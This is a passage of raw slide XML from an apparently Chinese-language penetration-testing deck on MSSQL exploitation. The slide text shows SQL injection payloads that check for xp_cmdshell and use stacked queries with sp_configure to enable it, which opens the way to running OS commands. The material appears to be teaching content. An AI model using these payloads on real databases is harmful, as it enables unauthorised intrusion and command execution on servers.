                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>='x' AND name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>查看是否存在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，返回 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>则存在 。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>开启 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sp_configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 'show advanced options', 1;RECONFIGURE;EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sp_configure</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xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>', 1;RECONFIGURE;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>关闭 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sp_configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 'show advanced options', 1;RECONFIGURE;EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sp_configure</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xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>', 0;RECONFIGURE;</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{794BCE03-8D9E-4CE6-95DA-F6001CBAC070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906719" y="1499986"/>
            <a:ext cx="3655121" cy="698268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8C033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>利用总结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8C033"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4FFFE6-75ED-4B09-BE2A-F6514086A878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503038" y="468853"/>
            <a:ext cx="2553904" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:ln w="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6179510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DD2E6D-2A2A-4437-AD96-86366062AD89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="921572" y="2382235"/>
            <a:ext cx="10577028" cy="4305531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91419" tIns="45710" rIns="91419" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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查看是否禁用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>id=0' union select 1,2,count(*) FROM master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> Where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> = 'X' AND name = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>'--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>id=1' and 1=(select count(*) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>master.sys.sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> where name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>')--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>id=0';EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sp_configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 'show advanced options', 1;RECONFIGURE;EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sp_configure</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xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>', 1;RECONFIGURE;--+</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{794BCE03-8D9E-4CE6-95DA-F6001CBAC070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906719" y="1499986"/>
            <a:ext cx="3655121" cy="698268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8C033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>利用总结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8C033"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4FFFE6-75ED-4B09-BE2A-F6514086A878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503038" y="468853"/>
            <a:ext cx="2553904" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ln w="0"/>
